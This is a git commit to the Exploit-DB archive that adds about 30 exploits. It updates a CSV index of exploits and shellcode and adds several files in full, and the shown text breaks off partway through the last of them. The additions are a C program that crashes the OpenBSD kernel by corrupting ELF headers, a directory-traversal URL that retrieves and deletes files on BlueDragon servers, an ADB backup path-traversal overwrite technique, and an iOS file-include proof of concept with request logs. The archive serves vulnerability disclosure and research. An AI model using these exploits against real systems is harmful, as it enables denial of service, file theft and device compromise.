DB: 2015-04-22
30 new exploits
This commit is contained in:
parent
aaae73b6cb
commit
fffcb94afe
31 changed files with 3137 additions and 6 deletions
42
files.csv
42
files.csv
|
@ -5823,7 +5823,7 @@ id,file,description,date,author,platform,type,port
|
|||
6214,platforms/php/webapps/6214.php,"Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit",2008-08-06,james,php,webapps,0
|
||||
6215,platforms/php/webapps/6215.txt,"Ppim <= 1.0 (Arbitrary File Delete/XSS) Multiple Vulnerabilities",2008-08-10,BeyazKurt,php,webapps,0
|
||||
6216,platforms/windows/dos/6216.html,"Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC",2008-08-10,"Guido Landi",windows,dos,0
|
||||
6217,platforms/windows/remote/6217.pl,"BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit",2008-08-10,LiquidWorm,windows,remote,0
|
||||
6217,platforms/windows/remote/6217.pl,"BlazeDVD 5.0 - PLF Playlist File Remote Buffer Overflow Exploit",2008-08-10,LiquidWorm,windows,remote,0
|
||||
6218,platforms/multiple/dos/6218.txt,"Sun xVM VirtualBox < 1.6.4 Privilege Escalation Vulnerability PoC",2008-08-10,"Core Security",multiple,dos,0
|
||||
6219,platforms/php/webapps/6219.txt,"e107 <= 0.7.11 - Arbitrary Variable Overwriting Vulnerability",2008-08-10,"GulfTech Security",php,webapps,0
|
||||
6220,platforms/windows/remote/6220.html,"Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BoF Exploit",2008-08-10,"Guido Landi",windows,remote,0
|
||||
|
@ -14782,7 +14782,7 @@ id,file,description,date,author,platform,type,port
|
|||
16988,platforms/php/webapps/16988.txt,"WikiWig 5.01 - Multiple XSS Vulnerabilities",2011-03-16,"AutoSec Tools",php,webapps,0
|
||||
16989,platforms/php/webapps/16989.txt,"b2evolution 4.0.3 Persistent XSS Vulnerability",2011-03-16,"AutoSec Tools",php,webapps,0
|
||||
16990,platforms/multiple/remote/16990.rb,"Sun Java Applet2ClassLoader - Remote Code Execution Exploit",2011-03-16,metasploit,multiple,remote,0
|
||||
16991,platforms/windows/local/16991.txt,"Microsoft Source Code Analyzer for SQL Injection 1.3 Improper Permissions",2011-03-17,LiquidWorm,windows,local,0
|
||||
16991,platforms/windows/local/16991.txt,"Microsoft Source Code Analyzer for SQL Injection 1.3 - Improper Permissions",2011-03-17,LiquidWorm,windows,local,0
|
||||
16992,platforms/php/webapps/16992.txt,"Joomla! 1.6 - Multiple SQL Injection Vulnerabilities",2011-03-17,"Aung Khant",php,webapps,0
|
||||
16993,platforms/hardware/remote/16993.pl,"ACTi ASOC 2200 Web Configurator <= 2.6 - Remote Root Command Execution",2011-03-17,"Todor Donev",hardware,remote,0
|
||||
16995,platforms/php/webapps/16995.txt,"Joomla com_booklibrary - SQL Injection",2011-03-17,"Marc Doudiet",php,webapps,0
|
||||
|
@ -26455,6 +26455,7 @@ id,file,description,date,author,platform,type,port
|
|||
29443,platforms/windows/dos/29443.py,"VideoLan VLC Media Player 0.8.6a Unspecified Denial of Service Vulnerability",2007-01-11,shinnai,windows,dos,0
|
||||
29444,platforms/windows/dos/29444.pl,"CA BrightStor ARCserve Backup Message Engine/Tape Engine Remote Buffer Overflow Vulnerability",2007-01-11,"Tenable NS",windows,dos,0
|
||||
29445,platforms/windows/dos/29445.rb,"Hanso Player 2.5.0 - 'm3u' Buffer Overflow (DoS)",2013-11-05,"Necmettin COSKUN",windows,dos,0
|
||||
36794,platforms/multiple/webapps/36794.txt,"SevenIT SevDesk 3.10 - Multiple Web Vulnerabilities",2015-04-21,Vulnerability-Lab,multiple,webapps,0
|
||||
29446,platforms/linux/local/29446.c,"Grsecurity Kernel PaX - Local Privilege Escalation Vulnerability",2006-12-18,anonymous,linux,local,0
|
||||
29447,platforms/windows/dos/29447.txt,"WinZip 9.0 Command Line Remote Buffer Overflow Vulnerability",2007-01-12,"Umesh Wanve",windows,dos,0
|
||||
29448,platforms/osx/remote/29448.txt,"Apple Mac OS X 10.4.8 - DMG UFS Byte_Swap_Sbin() Integer Overflow Vulnerability",2007-01-12,LMH,osx,remote,0
|
||||
|
@ -32993,6 +32994,7 @@ id,file,description,date,author,platform,type,port
|
|||
36575,platforms/multiple/webapps/36575.py,"JBoss AS versions 3_ 4_ 5_ 6 - Remote Command Execution",2015-03-31,"João Filho Matos Figueiredo",multiple,webapps,0
|
||||
36576,platforms/php/webapps/36576.txt,"WordPress SP Project & Document Manager 2.5.3 - Blind SQL Injection",2015-03-31,Catsecurity,php,webapps,0
|
||||
36577,platforms/multiple/remote/36577.py,"Airties Air5650TT - Remote Stack Overflow",2015-03-31,"Batuhan Burakcin",multiple,remote,0
|
||||
36739,platforms/osx/local/36739.m,"Apple MAC OS X < 10.9/10 - Local Root Exploit",2015-04-13,mu-b,osx,local,0
|
||||
36579,platforms/windows/remote/36579.rb,"Adobe Flash Player ByteArray With Workers Use After Free",2015-03-31,metasploit,windows,remote,0
|
||||
36580,platforms/windows/webapps/36580.rb,"Palo Alto Traps Server 3.1.2.1546 - Persistent XSS Vulnerability",2015-03-31,"Michael Hendrickx",windows,webapps,0
|
||||
36581,platforms/php/webapps/36581.txt,"Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities",2015-03-31,Mahendra,php,webapps,80
|
||||
|
@ -33048,6 +33050,7 @@ id,file,description,date,author,platform,type,port
|
|||
36633,platforms/linux/dos/36633.txt,"Wireshark Buffer Underflow and Denial of Service Vulnerabilities",2012-01-10,"Laurent Butti",linux,dos,0
|
||||
36634,platforms/php/webapps/36634.txt,"Joomla! 'com_visa' Component Local File Include and SQL Injection Vulnerabilities",2012-01-28,the_cyber_nuxbie,php,webapps,0
|
||||
36635,platforms/php/webapps/36635.txt,"Joomla! 'com_firmy' Component 'Id' Parameter SQL Injection Vulnerability",2012-01-30,the_cyber_nuxbie,php,webapps,0
|
||||
36637,platforms/lin_x86/shellcode/36637.c,"Disable ASLR in Linux (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",lin_x86,shellcode,0
|
||||
36638,platforms/php/webapps/36638.txt,"Joomla! 'com_crhotels' Component 'catid' Parameter Remote SQL Injection Vulnerability",2012-01-31,the_cyber_nuxbie,php,webapps,0
|
||||
36639,platforms/php/webapps/36639.txt,"Joomla! 'com_propertylab' Component 'id' Parameter Remote SQL Injection Vulnerability",2012-01-30,the_cyber_nuxbie,php,webapps,0
|
||||
36640,platforms/php/webapps/36640.txt,"WordPress Work The Flow File Upload 2.5.2 - Arbitrary File Upload Vulnerability",2015-04-05,"Claudio Viviani",php,webapps,0
|
||||
|
@ -33156,15 +33159,16 @@ id,file,description,date,author,platform,type,port
|
|||
36752,platforms/php/webapps/36752.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_sensor.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
|
||||
36753,platforms/php/webapps/36753.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_time.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
|
||||
36754,platforms/php/webapps/36754.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_uaddr.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
|
||||
36751,platforms/php/webapps/36751.txt,"Wordpress Video Gallery 2.8 SQL Injection",2015-04-14,"Claudio Viviani",php,webapps,80
|
||||
36751,platforms/php/webapps/36751.txt,"Wordpress Video Gallery 2.8 - SQL Injection",2015-04-14,"Claudio Viviani",php,webapps,80
|
||||
36750,platforms/lin_x86-64/shellcode/36750.c,"linux/x86 setreuid(0_ 0) + execve(""/sbin/halt"") + exit(0) - 49 bytes",2015-04-14,"Febriyanto Nugroho",lin_x86-64,shellcode,0
|
||||
36755,platforms/php/webapps/36755.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_user.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
|
||||
36756,platforms/windows/remote/36756.html,"Samsung iPOLiS ReadConfigValue Remote Code Execution",2015-04-14,"Praveen Darshanam",windows,remote,0
|
||||
36757,platforms/php/webapps/36757.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 index.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
|
||||
36758,platforms/php/webapps/36758.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 admin/base_useradmin.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
|
||||
36759,platforms/php/webapps/36759.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 admin/index.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
|
||||
36760,platforms/php/webapps/36760.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_ag_main.php Crafted File Upload Arbitrary Code Execution",2012-02-11,indoushka,php,webapps,0
|
||||
36762,platforms/php/webapps/36762.txt,"WordPress MiwoFTP Plugin 1.0.5 Multiple CSRF XSS Vulnerabilities",2015-04-14,LiquidWorm,php,webapps,80
|
||||
36763,platforms/php/webapps/36763.txt,"WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Creation Exploit (RCE)",2015-04-14,LiquidWorm,php,webapps,80
|
||||
36762,platforms/php/webapps/36762.txt,"WordPress MiwoFTP Plugin 1.0.5 - Multiple CSRF XSS Vulnerabilities",2015-04-14,LiquidWorm,php,webapps,80
|
||||
36763,platforms/php/webapps/36763.txt,"WordPress MiwoFTP Plugin 1.0.5 - CSRF Arbitrary File Creation Exploit (RCE)",2015-04-14,LiquidWorm,php,webapps,80
|
||||
36764,platforms/php/webapps/36764.txt,"SMW+ 1.5.6 'target' Parameter HTML Injection Vulnerability",2012-02-13,sonyy,php,webapps,0
|
||||
36765,platforms/php/webapps/36765.txt,"Powie pFile 1.02 pfile/kommentar.php filecat Parameter XSS",2012-02-13,indoushka,php,webapps,0
|
||||
36766,platforms/php/webapps/36766.txt,"Powie pFile 1.02 pfile/file.php id Parameter SQL Injection",2012-02-13,indoushka,php,webapps,0
|
||||
|
@ -33175,8 +33179,15 @@ id,file,description,date,author,platform,type,port
|
|||
36771,platforms/php/webapps/36771.txt,"STHS v2 Web Portal team.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0
|
||||
36772,platforms/cgi/webapps/36772.txt,"EditWrxLite CMS 'wrx.cgi' Remote Command Execution Vulnerability",2012-02-13,chippy1337,cgi,webapps,0
|
||||
36773,platforms/windows/dos/36773.c,"Microsoft Window - HTTP.sys PoC (MS15-034)",2015-04-15,rhcp011235,windows,dos,0
|
||||
36774,platforms/php/webapps/36774.txt,"WordPress MiwoFTP Plugin 1.0.5 - Arbitrary File Download Exploit",2015-04-15,"Necmettin COSKUN",php,webapps,0
|
||||
36807,platforms/php/webapps/36807.txt,"GoAutoDial 3.3-1406088000 - Multiple Vulnerabilities",2015-04-21,"Chris McCurley",php,webapps,80
|
||||
36776,platforms/windows/dos/36776.py,"MS Windows (HTTP.sys) HTTP Request Parsing DoS (MS15-034)",2015-04-16,"laurent gaffie",windows,dos,80
|
||||
36777,platforms/php/webapps/36777.txt,"Wordpress Ajax Store Locator 1.2 SQL Injection Vulnerability",2015-04-16,"Claudio Viviani",php,webapps,80
|
||||
36777,platforms/php/webapps/36777.txt,"Wordpress Ajax Store Locator 1.2 - SQL Injection Vulnerability",2015-04-16,"Claudio Viviani",php,webapps,80
|
||||
36778,platforms/lin_x86/shellcode/36778.c,"Linux/x86 execve ""/bin/sh"" - shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",lin_x86,shellcode,0
|
||||
36779,platforms/win32/shellcode/36779.c,"win32/xp sp3 Create (""file.txt"") (83 bytes)",2015-04-17,"TUNISIAN CYBER",win32,shellcode,0
|
||||
36780,platforms/win32/shellcode/36780.c,"win32/xp sp3 - Restart computer",2015-04-17,"TUNISIAN CYBER",win32,shellcode,0
|
||||
36781,platforms/lin_x86/shellcode/36781.py,"Linux custom execve-shellcode Encoder/Decoder",2015-04-17,"Konstantinos Alexiou",lin_x86,shellcode,0
|
||||
36782,platforms/linux/local/36782.sh,"Apport - Local Linux Root",2015-04-17,"Ricardo F. Teixeira",linux,local,0
|
||||
36784,platforms/php/webapps/36784.txt,"11in1 CMS 1.2.1 - index.php class Parameter Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",php,webapps,0
|
||||
36785,platforms/php/webapps/36785.txt,"11in1 CMS 1.2.1 - admin/index.php class Parameter Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",php,webapps,0
|
||||
36786,platforms/php/webapps/36786.txt,"11in1 CMS 1.2.1 - Admin Password Manipulation CSRF",2012-02-15,"High-Tech Bridge SA",php,webapps,0
|
||||
|
@ -33187,3 +33198,22 @@ id,file,description,date,author,platform,type,port
|
|||
36791,platforms/php/webapps/36791.txt,"CMS Faethon 1.3.4 - 'articles.php' Multiple SQL Injection Vulnerabilities",2012-02-16,tempe_mendoan,php,webapps,0
|
||||
36792,platforms/php/webapps/36792.txt,"Pandora FMS 4.0.1 - 'sec2' Parameter Local File Include Vulnerability",2012-02-17,"Ucha Gobejishvili",php,webapps,0
|
||||
36793,platforms/php/webapps/36793.txt,"ButorWiki 3.0 - 'service' Parameter Cross Site Scripting Vulnerability",2012-02-17,sonyy,php,webapps,0
|
||||
36795,platforms/ios/webapps/36795.txt,"Wifi Drive Pro 1.2 iOS - File Include Web Vulnerability",2015-04-21,Vulnerability-Lab,ios,webapps,0
|
||||
36796,platforms/ios/webapps/36796.txt,"Photo Manager Pro 4.4.0 iOS - File Include Vulnerability",2015-04-21,Vulnerability-Lab,ios,webapps,0
|
||||
36797,platforms/ios/webapps/36797.txt,"Mobile Drive HD 1.8 - File Include Web Vulnerability",2015-04-21,Vulnerability-Lab,ios,webapps,0
|
||||
36798,platforms/ios/webapps/36798.txt,"Photo Manager Pro 4.4.0 iOS - Code Execution Vulnerability",2015-04-21,Vulnerability-Lab,ios,webapps,0
|
||||
36799,platforms/bsd/local/36799.c,"OpenBSD <= 5.6 - Multiple Local Kernel Panics",2015-04-21,nitr0us,bsd,local,0
|
||||
36800,platforms/php/webapps/36800.txt,"Wordpress NEX-Forms < 3.0 - SQL Injection Vulnerability",2015-04-21,"Claudio Viviani",php,webapps,0
|
||||
36801,platforms/php/webapps/36801.txt,"WordPress MiwoFTP Plugin <= 1.0.5 - Arbitrary File Download",2015-04-21,"dadou dz",php,webapps,0
|
||||
36802,platforms/php/webapps/36802.txt,"WordPress Tune Library Plugin 1.5.4 - SQL Injection Vulnerability",2015-04-21,"Hannes Trunde",php,webapps,0
|
||||
36803,platforms/windows/remote/36803.py,"ProFTPd 1.3.5 - Remote Command Execution",2015-04-21,R-73eN,windows,remote,0
|
||||
36804,platforms/php/webapps/36804.pl,"MediaSuite CMS - Artibary File Disclosure Exploit",2015-04-21,"KnocKout inj3ct0r",php,webapps,0
|
||||
36805,platforms/php/webapps/36805.txt,"WordPress Community Events Plugin 1.3.5 - SQL Injection Vulnerability",2015-04-21,"Hannes Trunde",php,webapps,0
|
||||
36808,platforms/windows/remote/36808.rb,"Adobe Flash Player copyPixelsToByteArray Integer Overflow",2015-04-21,metasploit,windows,remote,0
|
||||
36809,platforms/php/remote/36809.rb,"Wordpress Reflex Gallery Upload Vulnerability",2015-04-21,metasploit,php,remote,80
|
||||
36810,platforms/php/remote/36810.rb,"Wordpress N-Media Website Contact Form Upload Vulnerability",2015-04-21,metasploit,php,remote,80
|
||||
36811,platforms/php/remote/36811.rb,"Wordpress Creative Contact Form Upload Vulnerability",2015-04-21,metasploit,php,remote,80
|
||||
36812,platforms/php/remote/36812.rb,"Wordpress Work The Flow Upload Vulnerability",2015-04-21,metasploit,php,remote,80
|
||||
36813,platforms/hardware/local/36813.txt,"ADB Backup Archive Path Traversal File Overwrite",2015-04-21,"Imre Rad",hardware,local,0
|
||||
36814,platforms/osx/dos/36814.c,"Mac OS X Local Denial of Service",2015-04-21,"Maxime Villard",osx,dos,0
|
||||
36815,platforms/cfm/webapps/36815.txt,"BlueDragon CFChart Servlet 7.1.1.17759 - Arbitrary File Retrieval/Deletion",2015-04-21,Portcullis,cfm,webapps,80
|
||||
|
|
Can't render this file because it is too large.
|
94
platforms/bsd/local/36799.c
Executable file
94
platforms/bsd/local/36799.c
Executable file
|
@ -0,0 +1,94 @@
|
|||
/*
|
||||
|
||||
# Exploit Title: OpenBSD <= 5.6 - Multiple Local Kernel Panics
|
||||
# Exploit Author: nitr0us
|
||||
# Vendor Homepage: http://www.openbsd.org
|
||||
# Version: 5.6
|
||||
# Tested on: OpenBSD 5.6 i386 (snapshot - Nov 25th, 2014), OpenBSD 5.6 i386, OpenBSD 5.5 i386
|
||||
|
||||
* - 0xb16b00b5.c
|
||||
*
|
||||
* - Alejandro Hernandez (@nitr0usmx)
|
||||
* - Mexico 2015
|
||||
*
|
||||
* #########################################################################
|
||||
* # OpenBSD <= 5.6 kernel panic()'s in sys/uvm/uvm_map.c #
|
||||
* #########################################################################
|
||||
*
|
||||
* Tested under:
|
||||
* - OpenBSD 5.6 i386 (snapshot - Nov 25th, 2014)
|
||||
* - OpenBSD 5.6 i386
|
||||
* - OpenBSD 5.5 i386
|
||||
*
|
||||
* https://www.youtube.com/watch?feature=player_detailpage&v=PReopSQZOrY#t=20
|
||||
*
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <unistd.h>
|
||||
#include <fcntl.h>
|
||||
#include <sys/stat.h>
|
||||
#include <sys/mman.h>
|
||||
#include <sys/param.h>
|
||||
#include <sys/types.h>
|
||||
|
||||
#ifndef __OpenBSD__
|
||||
#error "Not OpenBSD !!!1111";
|
||||
#else
|
||||
#include <sys/exec_elf.h>
|
||||
#endif
|
||||
|
||||
#ifndef __i386__
|
||||
#error "Not i386 !!!1111";
|
||||
#endif
|
||||
|
||||
char big_b00bz[] =
|
||||
" 8M:::::::8888M:::::888:::::::88:::8888888::::::::Mm\n"
|
||||
" 88MM:::::8888M:::::::88::::::::8:::::888888:::M:::::M\n"
|
||||
" 8888M:::::888MM::::::::8:::::::::::M::::8888::::M::::M\n"
|
||||
" 88888M:::::88:M::::::::::8:::::::::::M:::8888::::::M::M\n"
|
||||
" 88 888MM:::888:M:::::::::::::::::::::::M:8888:::::::::M:\n"
|
||||
" 8 88888M:::88::M:::::::::::::::::::::::MM:88::::::::::::M\n"
|
||||
" 88888M:::88::M::::::::::*88*::::::::::M:88::::::::::::::M\n"
|
||||
" 888888M:::88::M:::::::::88@@88:::::::::M::88::::::::::::::M\n"
|
||||
" 888888MM::88::MM::::::::88@@88:::::::::M:::8::::::::::::::*8\n"
|
||||
" 88888 M:::8::MM:::::::::*88*::::::::::M:::::::::::::::::88@@\n"
|
||||
" 8888 MM::::::MM:::::::::::::::::::::MM:::::::::::::::::88@@\n"
|
||||
" 888 M:::::::MM:::::::::::::::::::MM::M::::::::::::::::*8\n"
|
||||
" 888 MM:::::::MMM::::::::::::::::MM:::MM:::::::::::::::M\n"
|
||||
" 88 M::::::::MMMM:::::::::::MMMM:::::MM::::::::::::MM\n"
|
||||
" 88 MM:::::::::MMMMMMMMMMMMMMM::::::::MMM::::::::MMM\n"
|
||||
" 88 MM::::::::::::MMMMMMM::::::::::::::MMMMMMMMMM\n"
|
||||
" 88 8MM::::::::::::::::::::::::::::::::::MMMMMM\n"
|
||||
" 8 88MM::::::::::::::::::::::M:::M::::::::MM\n"
|
||||
" 888MM::::::::::::::::::MM::::::MM::::::M";
|
||||
|
||||
int main(int argc, char **argv)
|
||||
{
|
||||
Elf32_Ehdr *hdr;
|
||||
Elf32_Phdr *pht;
|
||||
struct stat statinfo;
|
||||
char *elfptr;
|
||||
int fd;
|
||||
|
||||
if(argc != 2) return printf("Usage: %s <elf_exec>\n", argv[0]);
|
||||
fd = open(argv[1], O_RDWR);
|
||||
fstat(fd, &statinfo);
|
||||
elfptr = (char *) mmap(NULL, statinfo.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
|
||||
hdr = (Elf32_Ehdr *) (elfptr);
|
||||
pht = (Elf32_Phdr *) (elfptr + hdr->e_phoff);
|
||||
printf("%s", big_b00bz);
|
||||
pht[9].p_type = 0x7defaced; // <--- these overwrites ------------v
|
||||
pht[2].p_filesz = (arc4random() % 2) ? 0x41414141 : 0x43434343; // are necessary
|
||||
sleep(3 + (arc4random() % 3));
|
||||
if(arc4random() % 3 == 2) puts(" .. I like b1g 0nez !!"); // 33.33% chance
|
||||
else { if(arc4random() % 2){ puts(" .. want s0me ?!"); pht[5].p_vaddr = 0xb16b00b5; } // .6666 * .5 = 33.33% chance
|
||||
else { puts(" .. j00 like it ?!"); pht[5].p_vaddr = 0x0ace55e8; }} // .6666 * .5 = 33.33% chance
|
||||
msync(elfptr, 0, MS_ASYNC);
|
||||
munmap(elfptr, statinfo.st_size);
|
||||
close(fd);
|
||||
sleep(3 + (arc4random() % 3));
|
||||
system(argv[1]); // ( o )( o ) panic()
|
||||
puts("... s0rry, this piece of sh1t didn't w0rk in j00r obsd\n");
|
||||
return 0xDEFECA7E;
|
||||
}
|
29
platforms/cfm/webapps/36815.txt
Executable file
29
platforms/cfm/webapps/36815.txt
Executable file
|
@ -0,0 +1,29 @@
|
|||
Vulnerability title: Arbitrary File Retrieval + Deletion In New Atlanta BlueDragon CFChart Servlet
|
||||
CVE: CVE-2014-5370
|
||||
Vendor: New Atlanta
|
||||
Product: BlueDragon CFChart Servlet
|
||||
Affected version: 7.1.1.17759
|
||||
Fixed version: 7.1.1.18527
|
||||
Reported by: Mike Westmacott
|
||||
Details:
|
||||
|
||||
The CFChart servlet of BlueDragon (component com.naryx.tagfusion.cfm.cfchartServlet) is vulnerable to arbitrary file retrieval due to a directory traversal vulnerability. In certain circumstances the retrieved file is also deleted.
|
||||
|
||||
Exploit:
|
||||
|
||||
In order to retrieve a file from a vulnerable server use the following URL in a web browser and intercept the response from the server:
|
||||
|
||||
|
||||
http://TARGETHOST/cfchart.cfchart?..\..\..\..\..\..\..\..\..\..\TARGETFILE
|
||||
|
||||
The browser will display a broken image, however the HTTP response will contain the file’s contents.
|
||||
|
||||
Further details at:
|
||||
|
||||
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-5370/
|
||||
|
||||
Copyright:
|
||||
Copyright (c) Portcullis Computer Security Limited 2015, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
|
||||
|
||||
Disclaimer:
|
||||
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
|
54
platforms/hardware/local/36813.txt
Executable file
54
platforms/hardware/local/36813.txt
Executable file
|
@ -0,0 +1,54 @@
|
|||
ADB backup archive path traversal file overwrite
|
||||
------------------------------------------------
|
||||
|
||||
Using adb one can create a backup of his/her Android device and store it
|
||||
on the PC. The backup archive is based on the tar file format.
|
||||
|
||||
By modifying tar headers to contain ../../ like patterns it is possible
|
||||
to overwrite files owned by the system user on writeable partitions.
|
||||
|
||||
|
||||
An example pathname in the tar header:
|
||||
apps/com.android.settings/sp/../../../../data/system/evil.txt
|
||||
Tar header checksum must be corrected of course.
|
||||
|
||||
When restoring the modified archive the BackupManagerService overwrites
|
||||
the resolved file name, since file name is not sanitized.
|
||||
|
||||
Bugfix in the version control:
|
||||
https://android.googlesource.com/platform/frameworks/base/+/7bc601d%5E!/#F0
|
||||
|
||||
|
||||
Android 5 (Lollipop) and newer versions are not affected (due to the
|
||||
official bugfix linked above).
|
||||
|
||||
|
||||
Additional conditions for exploiting on pre-Lollipop systems:
|
||||
|
||||
- Partition of the desination file must be mounted as writeable (eg.
|
||||
/system won't work, but /data does)
|
||||
|
||||
- It is not possible to overwrite files owned by root, since the process
|
||||
doing the restore is running as the same user as the package itself and
|
||||
Android packages cannot run.
|
||||
|
||||
- It is not possible to overwrite files owned by system user since AOSP
|
||||
4.3 due to Id6a0cb4c113c2e4a8c4605252cffa41bea22d8a3, a new hardening
|
||||
was introduced "... ignoring non-agent system package ".
|
||||
(If the operating system is custom and there is a system package
|
||||
available with a full backup agent specified explicitly, then that
|
||||
custom Android 4.3 and 4.4 might be affected too.)
|
||||
|
||||
Pre 4.3 AOSP systems are affected without further conditions: it is
|
||||
possible to overwrite files owned by the system user or any other
|
||||
packages installed on the system.
|
||||
|
||||
|
||||
|
||||
Tested on: Android 4.0.4:
|
||||
Reported on: 2014-07-14
|
||||
Assigned CVE: CVE-2014-7951
|
||||
Android bug id: 16298491
|
||||
Discovered by: Imre Rad / Search-Lab Ltd.
|
||||
http://www.search-lab.hu
|
||||
http://www.securecodingacademy.com/
|
185
platforms/ios/webapps/36795.txt
Executable file
185
platforms/ios/webapps/36795.txt
Executable file
|
@ -0,0 +1,185 @@
|
|||
Document Title:
|
||||
===============
|
||||
Wifi Drive Pro v1.2 iOS - File Include Web Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
http://www.vulnerability-lab.com/get_content.php?id=1447
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2015-03-13
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
1447
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
6.3
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
This app lets you use your iphone, iPad or iPod Touch as a wireless USB drive through which you can download, save and view documents and files.
|
||||
Using the app you can transfer files from your PC or Mac either wirelessly or through a USB port and carry your files wherever you go.
|
||||
|
||||
(Copy of the Vendor Homepage: https://itunes.apple.com/en/app/wifi-drive-pro/id579582610 )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The Vulnerability Laboratory Core Research Team discovered file include web vulnerability in the official Wifi Drive Pro v1.2 iOS mobile application.
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2015-03-13: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
Mindspeak Software
|
||||
Product: Wifi Drive Pro - iOS Mobile Web Application 1.2
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Local
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
High
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A local file include web vulnerability has been discovered in the official Mindspeak Software - Wifi Drive Pro v1.2 iOS mobile web-application.
|
||||
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands
|
||||
to compromise the mobile web-application.
|
||||
|
||||
The web vulnerability is located in the `filename` value of the `file upload` module. Remote attackers are able to inject own files with malicious
|
||||
`filename` values in the `file upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in
|
||||
the index file dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of the `wifi interface`
|
||||
in connection with the vulnerable file upload POST method request.
|
||||
|
||||
Remote attackers are also able to exploit the filename issue in combination with persistent injected script codes to execute different malicious
|
||||
attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST.
|
||||
|
||||
The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4.
|
||||
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation
|
||||
of the local file include web vulnerability results in mobile application compromise or connected device component compromise.
|
||||
|
||||
Request Method(s):
|
||||
[+] [POST]
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] File Upload
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] filename
|
||||
|
||||
Affected Module(s):
|
||||
[+] Index File Dir Listing (http://localhost:49276/)
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The local file include web vulnerability can be exploited by local attackers without privileged application user accounts or user interaction.
|
||||
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
PoC: GET
|
||||
http://localhost:49276//%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png
|
||||
|
||||
|
||||
PoC: Vulnerable Source
|
||||
<p><a href="..">..</a><br>
|
||||
<a href="68-2.png">68-2.png</a> ( 24.3 Kb, 2015-03-09 14:57:29 +0000)<br>
|
||||
<a href="/%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png"></%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png</a> ( 0.5 Kb, 2015-03-09 14:57:48 +0000)<br />
|
||||
</p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><label>upload file<input type="file" name="file" id="file" /></label>
|
||||
<label><input type="submit" name="button" id="button" value="Submit" /></label></form></body></html></iframe></a></p>
|
||||
|
||||
|
||||
--- PoC Session Logs [POST] (Inject)---
|
||||
Status: 200[OK]
|
||||
POST http://localhost:49276/
|
||||
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[846] Mime Type[application/x-unknown-content-type]
|
||||
Request Header:
|
||||
Host[localhost:49276]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
